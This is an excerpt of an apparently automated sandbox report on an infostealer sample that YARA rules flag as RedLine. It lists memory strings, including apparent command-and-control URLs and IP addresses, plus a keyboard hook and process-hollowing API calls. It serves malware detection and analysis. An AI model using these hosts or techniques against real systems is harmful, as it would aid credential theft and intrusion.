                    Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypqN
                    Source: alg.exe, 00000011.00000003.1589672551.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/sqxdgegqjrgdpvi
                    Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/a
                    Source: alg.exe, 00000011.00000003.2641931350.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/btnkoeanfymxsstk
                    Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/d
                    Source: alg.exe, 00000011.00000003.2633384477.0000000000678000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2410341370.0000000000676000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2177399665.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/hrkmkab
                    Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/pnbkkgdjorsjoiow
                    Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/s
                    Source: alg.exe, 00000011.00000003.2641931350.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/btnkoeanfymxsstkbat
                    Source: alg.exe, 00000011.00000003.2641931350.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/pnckkgdjorsjoiowPA
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knjghuig.biz/
                    Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                    Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                    Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.le
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                    Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: alg.exe, 00000011.00000003.2653651817.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2667859499.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/
                    Source: alg.exe, 00000011.00000003.2668324932.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2653910451.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/8
                    Source: C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.00000000209D0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1540095281.0000000021EA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021B3B000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1576898183.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 0000000B.00000000.1440342602.0000000000416000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.pmail.com
                    Source: alg.exe, 00000011.00000003.1966940811.0000000001590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
                    Source: alg.exe, 00000011.00000003.2537534713.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                    Source: alg.exe, 00000011.00000003.2088475642.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                    Source: alg.exe, 00000011.00000003.2090116293.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2090557256.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                    Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
                    Source: alg.exe, 00000011.00000003.2537614996.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                    Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/R
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020ADD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_Juqmtm
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AF3000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AC8000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.0000000000694000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_JuqmtmyadyyH
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyyc9
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy2
                    Source: alg.exe, 00000011.00000003.2537698906.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                    Source: alg.exe, 00000011.00000003.2537698906.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
                    Source: alg.exe, 00000011.00000003.2537281630.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
                    Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
                    Source: alg.exe, 00000011.00000003.2718995164.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/site/autoit/8
                    Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49708 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49759 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49826 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, cPKWk.cs .Net Code: I3Mi2zn6x
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Window created: window name: CLIPBRDWNDCLASS

                    System Summary

                    Source: 13.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 40.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 13.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: Trading_AIBot.exe.11.dr, cfRDgxIJtEfCD.cs Long String: Length: 17605
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File dump: apihost.exe.14.dr 665670656
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08670 NtUnmapViewOfSection
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08400 NtReadVirtualMemory
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D07A2C NtAllocateVirtualMemory
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D07D78 NtWriteVirtualMemory
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D07A2A NtAllocateVirtualMemory
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF64CA NtQueryInformationToken
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00F07460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF643A NtOpenThreadToken,NtOpenProcessToken,NtClose
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0A135 NtSetInformationFile
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF6500 NtQueryInformationToken,NtQueryInformationToken
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE4E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF64CA NtQueryInformationToken
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00F07460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF643A NtOpenThreadToken,NtOpenProcessToken,NtClose
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0A135 NtSetInformationFile
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF6500 NtQueryInformationToken,NtQueryInformationToken
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE4E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
                    Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE4C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess
                    Source: C:\Users\Public\alpha.pif File created: C:\Windows
                    Source: C:\Users\Public\alpha.pif File created: C:\Windows \SysWOW64
                    Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\605af54964cdb3b4.bin
                    Source: C:\Users\Public\alpha.pif File deleted: C:\Windows \SysWOW64
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF20C4
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE74B1
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4875
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE540A
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE4C10
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00F04191
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE9144
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0695A
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF3EB3
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF5A86
                    Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0769E
